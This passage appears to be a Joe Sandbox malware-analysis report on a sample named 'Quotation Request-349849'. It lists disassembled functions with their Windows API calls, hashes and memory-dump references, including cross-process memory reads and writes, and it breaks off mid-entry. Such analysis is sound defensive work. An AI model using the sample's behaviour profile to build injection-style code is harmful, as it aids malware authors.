                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$__itow$_memmove
                                                      • String ID:
                                                      • API String ID: 2983881199-0
                                                      • Opcode ID: b738f274ab8d1c293d7e048741a31f2c080fe6171b914dad71e19b40d56433e2
                                                      • Instruction ID: e73ad8da24c9053957c3f1bf05e6eef56b78b4c0a34601cd4efada340ce13478
                                                      • Opcode Fuzzy Hash: b738f274ab8d1c293d7e048741a31f2c080fe6171b914dad71e19b40d56433e2
                                                      • Instruction Fuzzy Hash: 2B21C531700218ABDB10EA649C8DEBE7BADFB58710F045026FE85D73D1E6B48D85C7A1
                                                      Function 00845A4D Relevance: 7.6, APIs: 5, Instructions: 70COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • IsWindow.USER32(00000000), ref: 00845A6E
                                                      • GetForegroundWindow.USER32 ref: 00845A85
                                                      • GetDC.USER32(00000000), ref: 00845AC1
                                                      • GetPixel.GDI32(00000000,?,00000003), ref: 00845ACD
                                                      • ReleaseDC.USER32(00000000,00000003), ref: 00845B08
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Window$ForegroundPixelRelease
                                                      • String ID:
                                                      • API String ID: 4156661090-0
                                                      • Opcode ID: 1710b847e641523b2c35c01c6289bc3b82d1064e3b51a9f57a1acf8323431984
                                                      • Instruction ID: 26574c5ec9d5f1812e27ecdda9df41db380653d501f11046f1cfc7283d22c0aa
                                                      • Opcode Fuzzy Hash: 1710b847e641523b2c35c01c6289bc3b82d1064e3b51a9f57a1acf8323431984
                                                      • Instruction Fuzzy Hash: 51215075A00208AFDB14EF69D888A6ABBF5FF48311F148479F909D7352CA74AD00CB90
                                                      Function 007D12F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 007D134D
                                                      • SelectObject.GDI32(?,00000000), ref: 007D135C
                                                      • BeginPath.GDI32(?), ref: 007D1373
                                                      • SelectObject.GDI32(?,00000000), ref: 007D139C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: ObjectSelect$BeginCreatePath
                                                      • String ID:
                                                      • API String ID: 3225163088-0
                                                      • Opcode ID: 80b1d4ead50e7370ade45f6a0f5733f6252cb78f8457f0567aaa88575ff1625b
                                                      • Instruction ID: b7ab3ce6680bdae7365dbcf84b27b230145460a8de65a185041d7eb33cbefd00
                                                      • Opcode Fuzzy Hash: 80b1d4ead50e7370ade45f6a0f5733f6252cb78f8457f0567aaa88575ff1625b
                                                      • Instruction Fuzzy Hash: 26217130801B08EFDB12AF25DD0876A7BB8FB10722F5C4227F811A66B1D7799891DF90
                                                      Function 0082BC9E Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: _memcmp
                                                      • String ID:
                                                      • API String ID: 2931989736-0
                                                      • Opcode ID: bf9fd7ea538d4562b3216959fbe2af3f119bd628cd622c45fdfe2202e87adb31
                                                      • Instruction ID: 9e8b68b50e54a10eca3afb38fb3d42d41e5ba7763a5d56d4f7a7017a3b9c6d90
                                                      • Opcode Fuzzy Hash: bf9fd7ea538d4562b3216959fbe2af3f119bd628cd622c45fdfe2202e87adb31
                                                      • Instruction Fuzzy Hash: 8B0180B160252DBAD2046B116D42FBBA75CFF603A8F044021FE15D6382EB59DE9082A0
                                                      Function 00834A93 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetCurrentThreadId.KERNEL32 ref: 00834ABA
                                                      • __beginthreadex.LIBCMT ref: 00834AD8
                                                      • MessageBoxW.USER32(?,?,?,?), ref: 00834AED
                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00834B03
                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00834B0A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                      • String ID:
                                                      • API String ID: 3824534824-0
                                                      • Opcode ID: c9361c9026a178edee0b1f07328af20462791af1de9a3f7f657909c9a37c21c4
                                                      • Instruction ID: 900c3a88be833b12b8d7f70ddac174992ce9f3d9b8707b07212ab9f0b1ebac54
                                                      • Opcode Fuzzy Hash: c9361c9026a178edee0b1f07328af20462791af1de9a3f7f657909c9a37c21c4
                                                      • Instruction Fuzzy Hash: 3E110476905618BBC702AFE8AC08A9B7FACFB85321F18426AF924D3351D675D90087E0
                                                      Function 00828202 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 0082821E
                                                      • GetLastError.KERNEL32(?,00827CE2,?,?,?), ref: 00828228
                                                      • GetProcessHeap.KERNEL32(00000008,?,?,00827CE2,?,?,?), ref: 00828237
                                                      • HeapAlloc.KERNEL32(00000000,?,00827CE2,?,?,?), ref: 0082823E
                                                      • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00828255
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                      • String ID:
                                                      • API String ID: 842720411-0
                                                      • Opcode ID: 2d4f01c994fceb13f1f8a4d32726a00f71710994aa13c6481321ea337f1c87ff
                                                      • Instruction ID: 0dea407fa3fcd190319aad29bf5972b158a2a76e2844323a5dca1c972dcc928f
                                                      • Opcode Fuzzy Hash: 2d4f01c994fceb13f1f8a4d32726a00f71710994aa13c6481321ea337f1c87ff
                                                      • Instruction Fuzzy Hash: 2D016971242724FFDF204FA6EC48DAB7BACFF8A756B500469F909C3220DA358C40CA60
                                                      Function 0082710A Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00827044,80070057,?,?,?,00827455), ref: 00827127
                                                      • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00827044,80070057,?,?), ref: 00827142
                                                      • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00827044,80070057,?,?), ref: 00827150
                                                      • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00827044,80070057,?), ref: 00827160
                                                      • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00827044,80070057,?,?), ref: 0082716C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: From$Prog$FreeStringTasklstrcmpi
                                                      • String ID:
                                                      • API String ID: 3897988419-0
                                                      • Opcode ID: edafb01982287621783a3a3da7396c041aa5b5ca6b881ace0b87ecdba9fbf8e4
                                                      • Instruction ID: 0830ac3391511a71cde35a1ed6180324a43e07e4ca7834a2ce4b362e909e6353
                                                      • Opcode Fuzzy Hash: edafb01982287621783a3a3da7396c041aa5b5ca6b881ace0b87ecdba9fbf8e4
                                                      • Instruction Fuzzy Hash: 7A018472601324BBDB114F65EC44BAA7BADFF48752F140074FE04D2211D735DD909BA0
                                                      Function 00835244 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00835260
                                                      • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0083526E
                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00835276
                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00835280
                                                      • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 008352BC
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: PerformanceQuery$CounterSleep$Frequency
                                                      • String ID:
                                                      • API String ID: 2833360925-0
                                                      • Opcode ID: e7c8804debd60b4943cb0fa4dde6821b76492cb9e86a46cb828de0229e500197
                                                      • Instruction ID: dc2ed090014a08b53979501babca574096034a0e1e423c153c8ee56b7eeaaa27
                                                      • Opcode Fuzzy Hash: e7c8804debd60b4943cb0fa4dde6821b76492cb9e86a46cb828de0229e500197
                                                      • Instruction Fuzzy Hash: FA012931D02A1DDBCF00EFE4EC49AEEBB78FB49712F410556EA45F2291CB34955487A1
                                                      Function 0082810A Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00828121
                                                      • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0082812B
                                                      • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0082813A
                                                      • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00828141
                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00828157
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                      • String ID:
                                                      • API String ID: 44706859-0
                                                      • Opcode ID: b3cec53dba41095fe936182b8004a93ae301e92593ea4388f287f12a3139cf4d
                                                      • Instruction ID: bff57e943c46d766b449c1435ca34df3b83d7bec011bfb305545a193cbe16bfb
                                                      • Opcode Fuzzy Hash: b3cec53dba41095fe936182b8004a93ae301e92593ea4388f287f12a3139cf4d
                                                      • Instruction Fuzzy Hash: 07F0C270242324EFEB120FA4EC8DE6B3BACFF49755F000025FA45C3191CB649C55DA60
                                                      Function 0082C1E3 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetDlgItem.USER32(?,000003E9), ref: 0082C1F7
                                                      • GetWindowTextW.USER32(00000000,?,00000100), ref: 0082C20E
                                                      • MessageBeep.USER32(00000000), ref: 0082C226
                                                      • KillTimer.USER32(?,0000040A), ref: 0082C242
                                                      • EndDialog.USER32(?,00000001), ref: 0082C25C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                      • String ID:
                                                      • API String ID: 3741023627-0
                                                      • Opcode ID: 9f84859f1a7658db4564a56509664cb59fa75e2a2b594d6f59ea861d6619fd46
                                                      • Instruction ID: eb80ff3be8fff552892294daf065b306f6a538341d13f8208721ff41dbf20304
                                                      • Opcode Fuzzy Hash: 9f84859f1a7658db4564a56509664cb59fa75e2a2b594d6f59ea861d6619fd46
                                                      • Instruction Fuzzy Hash: 9801A730404314D7EB206B60ED4EFA677B8FF10707F00026AB642D14E1DBE469848B50
                                                      Function 007D13B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • EndPath.GDI32(?), ref: 007D13BF
                                                      • StrokeAndFillPath.GDI32(?,?,0080B888,00000000,?), ref: 007D13DB
                                                      • SelectObject.GDI32(?,00000000), ref: 007D13EE
                                                      • DeleteObject.GDI32 ref: 007D1401
                                                      • StrokePath.GDI32(?), ref: 007D141C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Path$ObjectStroke$DeleteFillSelect
                                                      • String ID:
                                                      • API String ID: 2625713937-0
                                                      • Opcode ID: 6c340df5fe38538d324cb24d85a28841f35ab12c35cb9ab3507dad7a16376884
                                                      • Instruction ID: 6ed18c7075f3d240c8a1c959f138882a19abbd5718e49fa37919dea18e5b3d38
                                                      • Opcode Fuzzy Hash: 6c340df5fe38538d324cb24d85a28841f35ab12c35cb9ab3507dad7a16376884
                                                      • Instruction Fuzzy Hash: 37F0B230005B48EBDB126F26EC4C75A3FA4BB01326F5C8236F529991F2C7398995DF60
                                                      Function 007E2CFB Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 007F0DB6: std::exception::exception.LIBCMT ref: 007F0DEC
                                                        • Part of subcall function 007F0DB6: __CxxThrowException@8.LIBCMT ref: 007F0E01
                                                        • Part of subcall function 007D7DE1: _memmove.LIBCMT ref: 007D7E22
                                                        • Part of subcall function 007D7A51: _memmove.LIBCMT ref: 007D7AAB
                                                      • __swprintf.LIBCMT ref: 007E2ECD
                                                      Strings
                                                      • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 007E2D66
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                      • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                      • API String ID: 1943609520-557222456
                                                      • Opcode ID: 0209501bb7268ab5e9288ec6676b310ddee91ff653b4eabc9ed89588d4bad583
                                                      • Instruction ID: 1929b6faeaf90264bb6c6770fe0182370e8fcc6df4bf45cea9ca3cf701704e6f
                                                      • Opcode Fuzzy Hash: 0209501bb7268ab5e9288ec6676b310ddee91ff653b4eabc9ed89588d4bad583
                                                      • Instruction Fuzzy Hash: 64914C71108255DFC718EF28C89986EB7B8FF89710F04491EF5859B2A2EA38ED45CB52
                                                      Function 0083B93B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 007D4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007D4743,?,?,007D37AE,?), ref: 007D4770
                                                      • CoInitialize.OLE32(00000000), ref: 0083B9BB
                                                      • CoCreateInstance.OLE32(00862D6C,00000000,00000001,00862BDC,?), ref: 0083B9D4
                                                      • CoUninitialize.OLE32 ref: 0083B9F1
                                                        • Part of subcall function 007D9837: __itow.LIBCMT ref: 007D9862
                                                        • Part of subcall function 007D9837: __swprintf.LIBCMT ref: 007D98AC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                      • String ID: .lnk
                                                      • API String ID: 2126378814-24824748
                                                      • Opcode ID: f4cf7005682ceb4b5e317bce9ba668a095f61538b52daaf4fc87717eba9f41a8
                                                      • Instruction ID: 4290cf166600a67cbbe277548c5334ae8a9b9bb40540ec5a9f6b115e6788ef89
                                                      • Opcode Fuzzy Hash: f4cf7005682ceb4b5e317bce9ba668a095f61538b52daaf4fc87717eba9f41a8
                                                      • Instruction Fuzzy Hash: B9A121B56042059FCB00DF14C884D2ABBE5FF89724F048999F9999B3A2CB35EC45CB91
                                                      Function 007F501D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __startOneArgErrorHandling.LIBCMT ref: 007F50AD
                                                        • Part of subcall function 008000F0: __87except.LIBCMT ref: 0080012B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: ErrorHandling__87except__start
                                                      • String ID: pow
                                                      • API String ID: 2905807303-2276729525
                                                      • Opcode ID: 6d280a8068af769aa888b7944c0b2211b336445beaecdc48497dde00040ff0e3
                                                      • Instruction ID: 98a9104e822b782fb793fb031df1153c6579dacf8c7f9ab26de48faa8c5dc77f
                                                      • Opcode Fuzzy Hash: 6d280a8068af769aa888b7944c0b2211b336445beaecdc48497dde00040ff0e3
                                                      • Instruction Fuzzy Hash: AA514931A08A0A96DB527728CD0537E3B95FB41710F208D59E6D5C63EAEE388DC49EC6
                                                      Function 00818584 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 148COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: _memmove
                                                      • String ID: 3c~$_~
                                                      • API String ID: 4104443479-657907094
                                                      • Opcode ID: f12567dbf6c2b4a9841872f143caa880fa751b8f283e9f202e7d8794b01d2e97
                                                      • Instruction ID: 805d053e914965350157ce40c317113f286a348aff3dc155751e3de9ede58918
                                                      • Opcode Fuzzy Hash: f12567dbf6c2b4a9841872f143caa880fa751b8f283e9f202e7d8794b01d2e97
                                                      • Instruction Fuzzy Hash: 20514BB0A00609DFCF24CF68C885AEEBBB5FF45304F248529E85AD7250EB35E995CB51
                                                      Function 008297F5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 008314BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00829296,?,?,00000034,00000800,?,00000034), ref: 008314E6
                                                      • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0082983F
                                                        • Part of subcall function 00831487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,008292C5,?,?,00000800,?,00001073,00000000,?,?), ref: 008314B1
                                                        • Part of subcall function 008313DE: GetWindowThreadProcessId.USER32(?,?), ref: 00831409
                                                        • Part of subcall function 008313DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0082925A,00000034,?,?,00001004,00000000,00000000), ref: 00831419
                                                        • Part of subcall function 008313DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0082925A,00000034,?,?,00001004,00000000,00000000), ref: 0083142F
                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 008298AC
                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 008298F9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
